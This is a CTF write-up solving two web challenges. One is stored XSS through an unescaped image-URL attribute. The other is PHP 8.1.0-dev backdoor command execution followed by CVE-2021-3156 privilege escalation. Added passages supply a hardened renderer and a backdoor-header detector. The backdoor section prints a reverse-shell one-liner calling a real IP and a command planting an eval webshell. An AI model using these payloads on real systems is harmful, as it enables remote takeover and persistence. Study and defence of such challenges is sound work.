Contents
① What does 门酱 want to play?
First, try handing it an arbitrary link.
![](https://file.jishuzhan.net/article/1758237039951613953/786ec79e9f9d5a6269f4fb13bb0ac54f.webp)
Remote links cannot be visited. Combined with the comment feature, XSS comes to mind: we only need to give 门酱 a link to a comment page to visit.
Let's look at the comment section.
![](https://file.jishuzhan.net/article/1758237039951613953/792fadd05f097846a97bdd803e2ff838.webp)
From the comments we learn that 门酱 has to be made to play 元梦之星, so first try the direct approach:
```html
<script>document.location="https://ymzx.qq.com/";</script>
```
After submitting it, no redirect happened; presumably characters such as < and > are HTML-entity-encoded.
![](https://file.jishuzhan.net/article/1758237039951613953/ffce06f3539bf8b2ea1cc32d9670dedd.webp)
So what now? The challenge also provides a feature for inserting images into comments.
Submit one following the example (it must start with http://, otherwise it is not parsed as an image).
![](https://file.jishuzhan.net/article/1758237039951613953/ede19de00625f970122ebf49d150d5b5.webp)
![](https://file.jishuzhan.net/article/1758237039951613953/2522f30b97ce333feb5bdc9f499e0731.webp)
The link is inserted into the src attribute, so we can close the img tag directly with ">.
Post this comment:
```text
http://"><script>document.location="https://ymzx.qq.com/";</script>.png 123 /png
```
The page is successfully redirected to the 元梦之星 official site.
![](https://file.jishuzhan.net/article/1758237039951613953/b4eefb000480ed7b66b5a4f081dd3524.webp)
Capture the request with Burp Suite.
![](https://file.jishuzhan.net/article/1758237039951613953/bb64231bf57e5d94d0146c11dce65afd.webp)
This gives us the link to the malicious comment:
```text
http://node1.anna.nssctf.cn:28834/words/?title=MQ%3D%3D&content=aHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D
```
Hand this link to 门酱 to obtain the flag.
![](https://file.jishuzhan.net/article/1758237039951613953/c042ec308f59bd9ebcf3096bfb04af7c.webp)
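The root cause in this challenge is that the comment body is entity-encoded but the image URL is dropped into `src="..."` verbatim, so a `"` in the URL terminates the attribute. The following example is added here for illustration and is not part of the write-up or the challenge's own code; it shows a naive renderer beside a hardened one that validates the URL's scheme and host and escapes the value as an attribute. The function names, the `HOST_RE` pattern and the sample URLs are all my own constructions.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample inputs (not taken from the challenge): a benign image URL,
# a URL whose path contains a quote, and a URL of the same shape as the
# attribute-breaking payload used in the write-up.
BENIGN_URL = "http://img.example.com/cat.png"
QUOTED_PATH_URL = 'http://img.example.com/a"onerror="x.png'
BREAKOUT_URL = 'http://"><script>document.location="https://example.invalid/";</script>.png'

# Only a plain hostname (optionally with a port) is accepted as the netloc.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:\d{1,5})?$")


def render_image_naive(url: str) -> str:
    """The vulnerable pattern: the URL is concatenated straight into the attribute."""
    return '<img src="' + url + '">'


def is_safe_image_url(url: str) -> bool:
    """Accept only http(s) URLs whose authority part is a simple hostname."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(HOST_RE.match(parts.netloc))


def render_image(url: str) -> str:
    """Hardened renderer: validate first, then escape as an HTML attribute value.

    The escaping step is kept even for URLs that pass validation, so a quote
    that survives in the path (see QUOTED_PATH_URL) can never end the attribute.
    """
    if not is_safe_image_url(url):
        return "<span>[image URL rejected]</span>"
    return f'<img src="{html.escape(url, quote=True)}" alt="user image">'


if __name__ == "__main__":
    for u in (BENIGN_URL, QUOTED_PATH_URL, BREAKOUT_URL):
        print("naive   :", render_image_naive(u))
        print("hardened:", render_image(u))
```

Note that `urlsplit` alone is not a filter: for `BREAKOUT_URL` it happily reports a non-empty netloc, which is why the host pattern and the attribute escaping are both needed.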
② Becomeroot
On entry the page tells us directly that the PHP version is 8.1.0-dev.
![](https://file.jishuzhan.net/article/1758237039951613953/836d0844d352dac5abea60bf5039b830.webp)
Reference: PHP-8.1.0-dev backdoor command execution vulnerability reproduction (php/8.1.0-dev), CSDN blog.
```http
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");
```
This gives a reverse shell directly, after which we find that privilege escalation is needed.
![](https://file.jishuzhan.net/article/1758237039951613953/1cf394e81b8ba42f8ab0e553a3c374ac.webp)
![](https://file.jishuzhan.net/article/1758237039951613953/d8996359d4339ee351b6951253fdbe26.webp)
Reference: GitHub - Rvn0xsy/CVE-2021-3156-plus (non-interactive command execution for CVE-2021-3156).
The script is awkward to get onto the target machine, so it is easier to drop a webshell and connect to that instead.
```http
User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");
```
![](https://file.jishuzhan.net/article/1758237039951613953/34e4ed632ee3ee540dcbe1b57c2c0f95.webp)
![](https://file.jishuzhan.net/article/1758237039951613953/5c7110ac5c4f7f5809763245ee809c7d.webp)
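From the defender's side, the backdoor in this PHP build is easy to spot in traffic: it is triggered by a non-standard `User-Agentt` header whose value contains the string `zerodium`, and a legitimate client never sends that header at all. The following detection logic is an added example, not code from the write-up or from any referenced project; the sample request blocks are constructed, and the function names are my own.

```python
from typing import Dict, List, Tuple

# Constructed sample traffic (not from the write-up): raw HTTP request header
# blocks as a reverse proxy or log pipeline might capture them.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agentt: zerodiumphpinfo();\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: app.example\r\nuser-agentt: probe\r\n\r\n",
]


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw request into a dict of lower-cased header name -> value."""
    headers: Dict[str, str] = {}
    for line in raw.split("\r\n")[1:]:  # skip the request line
        if not line:
            break  # blank line terminates the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def classify_request(raw: str) -> str:
    """Return 'clean', 'suspicious' or 'exploit-attempt' for one request.

    Any User-Agentt header is suspicious because no real client sends it;
    a value containing 'zerodium' is the backdoor's trigger. The comparison
    is case-insensitive on purpose so that variants are still flagged.
    """
    headers = parse_headers(raw)
    if "user-agentt" not in headers:
        return "clean"
    if "zerodium" in headers["user-agentt"].lower():
        return "exploit-attempt"
    return "suspicious"


def scan(requests: List[str]) -> List[Tuple[int, str]]:
    """Index and verdict for every request that is not clean."""
    return [(i, verdict) for i, raw in enumerate(requests)
            if (verdict := classify_request(raw)) != "clean"]


def is_backdoored_banner(x_powered_by: str) -> bool:
    """True when a response banner advertises the compromised dev build."""
    return x_powered_by.strip() == "PHP/8.1.0-dev"


if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_REQUESTS):
        print(f"request #{idx}: {verdict}")
```

Alerting on the header name alone, not just on the `zerodium` prefix, is deliberate: a scanner probing for the backdoor shows up before any exploitation, and the banner check catches the vulnerable build even when no request has hit it yet.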
Tried a SUID privilege-escalation plugin first; that failed.
![](https://file.jishuzhan.net/article/1758237039951613953/137885269a1650e788b7a2173e3435d8.webp)
Upload the script from GitHub - Rvn0xsy/CVE-2021-3156-plus (non-interactive command execution for CVE-2021-3156) to the server.
Escalate privileges and execute commands (the environment is gone, so the screenshot is borrowed from another player).
![](https://file.jishuzhan.net/article/1758237039951613953/40124ec6e7519045b785046e5524b9fa.webp)